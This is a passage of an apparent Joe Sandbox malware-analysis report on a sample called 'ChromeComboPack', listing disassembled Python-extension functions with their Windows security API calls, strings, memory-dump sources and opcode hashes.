                                                                                                                                                                                                                                                • PyMem_Free.PYTHON312 ref: 00007FFD8A194282
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19C090: GetLastError.KERNEL32(?,?,?,?,?,00000000,00000000,00007FFD8A19786D,?,?,00000000,00007FFD8A197BE2,?,?,?,00007FFD8A191911), ref: 00007FFD8A19C0AB
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19C090: FormatMessageW.KERNEL32(?,?,?,?,?,00000000,00000000,00007FFD8A19786D,?,?,00000000,00007FFD8A197BE2,?,?,?,00007FFD8A191911), ref: 00007FFD8A19C11A
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19C090: PyUnicode_DecodeMBCS.PYTHON312(?,?,?,?,?,00000000,00000000,00007FFD8A19786D,?,?,00000000,00007FFD8A197BE2,?,?,?,00007FFD8A191911), ref: 00007FFD8A19C1EB
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19C090: _Py_BuildValue_SizeT.PYTHON312(?,?,?,?,?,00000000,00000000,00007FFD8A19786D,?,?,00000000,00007FFD8A197BE2,?,?,?,00007FFD8A191911), ref: 00007FFD8A19C200
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19C090: LocalFree.KERNEL32(?,?,?,?,?,00000000,00000000,00007FFD8A19786D,?,?,00000000,00007FFD8A197BE2,?,?,?,00007FFD8A191911), ref: 00007FFD8A19C218
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19C090: PyErr_SetObject.PYTHON312(?,?,?,?,?,00000000,00000000,00007FFD8A19786D,?,?,00000000,00007FFD8A197BE2,?,?,?,00007FFD8A191911), ref: 00007FFD8A19C22D
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19C090: _Py_Dealloc.PYTHON312(?,?,?,?,?,00000000,00000000,00007FFD8A19786D,?,?,00000000,00007FFD8A197BE2,?,?,?,00007FFD8A191911), ref: 00007FFD8A19C23C
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: BuildFree$Arg_AuditedDeallocDecodeErr_ErrorFormatFromLastLocalMem_MessageObjectParsePermissionsSizeTupleUnicode_ValueValue_
                                                                                                                                                                                                                                                • String ID: GetAuditedPermissionsFromAcl$O:GetAuditedPermissionsFromAcl
                                                                                                                                                                                                                                                • API String ID: 1813498087-1982696749
                                                                                                                                                                                                                                                • Opcode ID: 8a6ff8e7fc4ee454dbaf1a1bb3be092f6b23010d3761266b61acb2699630f883
                                                                                                                                                                                                                                                • Instruction ID: ad56b19d11ec1adaa7cf91dad9d071507f4d22cbb4999339413a0b8868b08b2a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8a6ff8e7fc4ee454dbaf1a1bb3be092f6b23010d3761266b61acb2699630f883
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FC116277709746A2EB448F51F5500BAABA0FF847D4F880171D64D47A68EF7CE445CB40
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Err_$BufferBuffer_FormatObject_ReleaseString
                                                                                                                                                                                                                                                • String ID: Buffer cannot be None$Buffer length can be at most %d characters
                                                                                                                                                                                                                                                • API String ID: 3539591379-686265896
                                                                                                                                                                                                                                                • Opcode ID: 569f538c9c836f433e0bd960f5d5e206e531757e9a54dd6106fd3398a81b04aa
                                                                                                                                                                                                                                                • Instruction ID: 859651ef506ee4625ee50933ed4f8b5146c0071e878689f18a467f1b52d956a6
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 569f538c9c836f433e0bd960f5d5e206e531757e9a54dd6106fd3398a81b04aa
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 82112B62B06B0292EA5C8F56E8A023867A5FB88F94F5891B0CD4D877A4DF3CF495C300
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • PyArg_ParseTuple.PYTHON312 ref: 00007FFD8A19414A
                                                                                                                                                                                                                                                • GetEffectiveRightsFromAclW.ADVAPI32 ref: 00007FFD8A194175
                                                                                                                                                                                                                                                • Py_BuildValue.PYTHON312 ref: 00007FFD8A19419A
                                                                                                                                                                                                                                                • PyMem_Free.PYTHON312 ref: 00007FFD8A1941B4
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19C090: GetLastError.KERNEL32(?,?,?,?,?,00000000,00000000,00007FFD8A19786D,?,?,00000000,00007FFD8A197BE2,?,?,?,00007FFD8A191911), ref: 00007FFD8A19C0AB
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19C090: FormatMessageW.KERNEL32(?,?,?,?,?,00000000,00000000,00007FFD8A19786D,?,?,00000000,00007FFD8A197BE2,?,?,?,00007FFD8A191911), ref: 00007FFD8A19C11A
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19C090: PyUnicode_DecodeMBCS.PYTHON312(?,?,?,?,?,00000000,00000000,00007FFD8A19786D,?,?,00000000,00007FFD8A197BE2,?,?,?,00007FFD8A191911), ref: 00007FFD8A19C1EB
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19C090: _Py_BuildValue_SizeT.PYTHON312(?,?,?,?,?,00000000,00000000,00007FFD8A19786D,?,?,00000000,00007FFD8A197BE2,?,?,?,00007FFD8A191911), ref: 00007FFD8A19C200
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19C090: LocalFree.KERNEL32(?,?,?,?,?,00000000,00000000,00007FFD8A19786D,?,?,00000000,00007FFD8A197BE2,?,?,?,00007FFD8A191911), ref: 00007FFD8A19C218
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19C090: PyErr_SetObject.PYTHON312(?,?,?,?,?,00000000,00000000,00007FFD8A19786D,?,?,00000000,00007FFD8A197BE2,?,?,?,00007FFD8A191911), ref: 00007FFD8A19C22D
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19C090: _Py_Dealloc.PYTHON312(?,?,?,?,?,00000000,00000000,00007FFD8A19786D,?,?,00000000,00007FFD8A197BE2,?,?,?,00007FFD8A191911), ref: 00007FFD8A19C23C
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: BuildFree$Arg_DeallocDecodeEffectiveErr_ErrorFormatFromLastLocalMem_MessageObjectParseRightsSizeTupleUnicode_ValueValue_
                                                                                                                                                                                                                                                • String ID: GetEffectiveRightsFromAcl$O:GetEffectiveRightsFromAcl
                                                                                                                                                                                                                                                • API String ID: 2032167972-568366055
                                                                                                                                                                                                                                                • Opcode ID: 303dce0aea7412f47779b6d1c60295076083a61708bba6cdfba5205ac26e9a70
                                                                                                                                                                                                                                                • Instruction ID: f02e1c047cefea3ecf187b3525d77d4cdf3cd2a918a9e04db75476b1954bb027
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 303dce0aea7412f47779b6d1c60295076083a61708bba6cdfba5205ac26e9a70
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E8117F33B09646A2EB088F12F8A01BAA7A0FF84BC4F884172D64D47658DF7CF445CB00
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Arg_ParseTuple$ClearErr_
                                                                                                                                                                                                                                                • String ID: AddAccesAllowedAce$lO:AddAccessAllowedAce$llO:AddAccessAllowedAce
                                                                                                                                                                                                                                                • API String ID: 2492218514-648165593
                                                                                                                                                                                                                                                • Opcode ID: 0fca3df125c9ca4b74ba172dc1ad24d14b13c3c223872720ecc417f5911fbe20
                                                                                                                                                                                                                                                • Instruction ID: c4a7a85db8644510721e061c38c619c3258bd777a80d19d5317f082267c834ce
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0fca3df125c9ca4b74ba172dc1ad24d14b13c3c223872720ecc417f5911fbe20
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7E111F73B09B46A2DB548F55F5504AABBA0FB84BD4F484072EA8D43B18EF3CE545CB40
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Arg_ParseTuple$ClearErr_
                                                                                                                                                                                                                                                • String ID: AddAccesDeniedAce$lO:AddAccessDeniedAce$llO:AddAccessDeniedAce
                                                                                                                                                                                                                                                • API String ID: 2492218514-45297876
                                                                                                                                                                                                                                                • Opcode ID: e0890082332542a30de38f29f9ead05091ac483cfbb9dea9cfcf4de0babcaec8
                                                                                                                                                                                                                                                • Instruction ID: 3e2f3ab30ff4bd94ff350fe27288d5a33e6bf3f6a7e6c2a36ef10cce449c16c5
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e0890082332542a30de38f29f9ead05091ac483cfbb9dea9cfcf4de0babcaec8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1A111F77B09B86A2DB548F15F5504AABBA0FB84BD4F444072EA8D47B18EF7CE544CB40
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • PyArg_ParseTuple.PYTHON312 ref: 00007FFD8A193BEB
                                                                                                                                                                                                                                                • GetAce.ADVAPI32 ref: 00007FFD8A193C06
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19C090: GetLastError.KERNEL32(?,?,?,?,?,00000000,00000000,00007FFD8A19786D,?,?,00000000,00007FFD8A197BE2,?,?,?,00007FFD8A191911), ref: 00007FFD8A19C0AB
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19C090: FormatMessageW.KERNEL32(?,?,?,?,?,00000000,00000000,00007FFD8A19786D,?,?,00000000,00007FFD8A197BE2,?,?,?,00007FFD8A191911), ref: 00007FFD8A19C11A
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19C090: PyUnicode_DecodeMBCS.PYTHON312(?,?,?,?,?,00000000,00000000,00007FFD8A19786D,?,?,00000000,00007FFD8A197BE2,?,?,?,00007FFD8A191911), ref: 00007FFD8A19C1EB
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19C090: _Py_BuildValue_SizeT.PYTHON312(?,?,?,?,?,00000000,00000000,00007FFD8A19786D,?,?,00000000,00007FFD8A197BE2,?,?,?,00007FFD8A191911), ref: 00007FFD8A19C200
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19C090: LocalFree.KERNEL32(?,?,?,?,?,00000000,00000000,00007FFD8A19786D,?,?,00000000,00007FFD8A197BE2,?,?,?,00007FFD8A191911), ref: 00007FFD8A19C218
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19C090: PyErr_SetObject.PYTHON312(?,?,?,?,?,00000000,00000000,00007FFD8A19786D,?,?,00000000,00007FFD8A197BE2,?,?,?,00007FFD8A191911), ref: 00007FFD8A19C22D
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19C090: _Py_Dealloc.PYTHON312(?,?,?,?,?,00000000,00000000,00007FFD8A19786D,?,?,00000000,00007FFD8A197BE2,?,?,?,00007FFD8A191911), ref: 00007FFD8A19C23C
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Arg_BuildDeallocDecodeErr_ErrorFormatFreeLastLocalMessageObjectParseSizeTupleUnicode_Value_
                                                                                                                                                                                                                                                • String ID: Ace type %d is not supported yet$GetAce$l:GetAce
                                                                                                                                                                                                                                                • API String ID: 2913267005-2172617993
                                                                                                                                                                                                                                                • Opcode ID: aef762dc7b89ada9127937277a53d1b5627c9c6045696fdecc209502e163c83b
                                                                                                                                                                                                                                                • Instruction ID: f9afbf7e06d7200e4e5451dcceab79094b1b50a5d01f75929d890150f9465326
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: aef762dc7b89ada9127937277a53d1b5627c9c6045696fdecc209502e163c83b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B2015277B1AA42A2EB09CB25E8601B57BA1FF84F84F884172CA4D47655DF3CF559C700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Arg_ControlDescriptorErr_ParseSecurityStringTuple
                                                                                                                                                                                                                                                • String ID: SetSecurityDescriptorControl$SetSecurityDescriptorControl does not exist on this platform$ll:SetSecurityDescriptorControl
                                                                                                                                                                                                                                                • API String ID: 1690190277-853495732
                                                                                                                                                                                                                                                • Opcode ID: c5fb905781387fc59d0c6ec67cab9ed427ef9051838924ecfa23633f0d9bec63
                                                                                                                                                                                                                                                • Instruction ID: 61cbe8df92df34c916819bafaa5fe5658a0a454dd1a10f864a368a9245c98f53
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c5fb905781387fc59d0c6ec67cab9ed427ef9051838924ecfa23633f0d9bec63
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EE012D57B1AA06A2EB588F65E8602752771FF84B84F4440B2D94D46264EF3CE595C700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • PyDEVMODE::PyDEVMODE - Unable to allocate DEVMODE of size %d, xrefs: 00007FFD8A194926
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: memcpy$Err_FormatReferencemalloc
                                                                                                                                                                                                                                                • String ID: PyDEVMODE::PyDEVMODE - Unable to allocate DEVMODE of size %d
                                                                                                                                                                                                                                                • API String ID: 3577276951-318570358
                                                                                                                                                                                                                                                • Opcode ID: e31a7c680d46d894b1b5cc69c1db71648538bd7e605b349bb94b818df4ba36f7
                                                                                                                                                                                                                                                • Instruction ID: 8dade87d948abb1933192f711436b5bc7ff1a49046fd88ef1227996f037488e6
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e31a7c680d46d894b1b5cc69c1db71648538bd7e605b349bb94b818df4ba36f7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4D015E62B1AA56A2DB58CF16E56017877B0FF48F84B484075DA4E03765EF3DE0A4C700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Err_$BuildClearDeallocStringValue
                                                                                                                                                                                                                                                • String ID: (i)$invalid timestamp
                                                                                                                                                                                                                                                • API String ID: 3614533335-2037815563
                                                                                                                                                                                                                                                • Opcode ID: a4125f9ac3bd078db836ea3183772ef5e2680fe1127ed21b291754ada7f20038
                                                                                                                                                                                                                                                • Instruction ID: 487016e820fc90ec2cceded011560ac0c0a49d6e591221c585bbba5bd8490fb1
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a4125f9ac3bd078db836ea3183772ef5e2680fe1127ed21b291754ada7f20038
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7701EC67B1AA06A1EA498F16A96413967A1BF98F95F4810B2C90E07764DE3CF489C700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Size$Arg_BuildErr_ParseStringTextTuple_UnicodeValue_
                                                                                                                                                                                                                                                • String ID: s#i$string size beyond INT_MAX
                                                                                                                                                                                                                                                • API String ID: 2518093472-3494499060
                                                                                                                                                                                                                                                • Opcode ID: dfd7dd9a82394ab18fc3658568d1f08c6994fe3d6dce12868a3255f76a01ff8a
                                                                                                                                                                                                                                                • Instruction ID: 4d312d4b43bd3705b36c2eeed40646bf1e34440758f22e5ee926413a4a960580
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dfd7dd9a82394ab18fc3658568d1f08c6994fe3d6dce12868a3255f76a01ff8a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B9012C76B09B46A2EE048B65E8601A967A1FB84B95F804172D58E83764DF3CF109CB80
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AuthorityBuildErr_IdentifierSizeStringValidValue_
                                                                                                                                                                                                                                                • String ID: (BBBBBB)$GetSidIdentifierAuthority: Invalid SID in object
                                                                                                                                                                                                                                                • API String ID: 2215780243-3761804006
                                                                                                                                                                                                                                                • Opcode ID: b0d73a36f6f348ebcd5edebfb7f5035f7f32f6c59f003da0e19b92cbc8ac1e39
                                                                                                                                                                                                                                                • Instruction ID: aaffec8d5e8bd6a79e07ee11c7f1c5c6e07bd373917420aaeb4514979a3e0079
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b0d73a36f6f348ebcd5edebfb7f5035f7f32f6c59f003da0e19b92cbc8ac1e39
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4E018F6771D69192E7458B21E8200387FA0FBC4F85F0980B1DA9F42360CF3CE564C700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CallsMakePending$ClearErr___acrt_iob_func__stdio_common_vfprintffprintf
                                                                                                                                                                                                                                                • String ID: Unhandled exception detected before entering Python.
                                                                                                                                                                                                                                                • API String ID: 322838838-920423093
                                                                                                                                                                                                                                                • Opcode ID: 736b9a258ff082faf70cc69d8895d9c1cebe8cae3e73d35b183ec6780337e48b
                                                                                                                                                                                                                                                • Instruction ID: 723f04115dc3ad7f8a714ff119af5947cf640147bb750a6f920a814e57dd44f4
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 736b9a258ff082faf70cc69d8895d9c1cebe8cae3e73d35b183ec6780337e48b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EAE01717F1F503BAF64C6F61EC792BA2A61BF94F85F8440B4C40E826A1EE1CB499C210
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
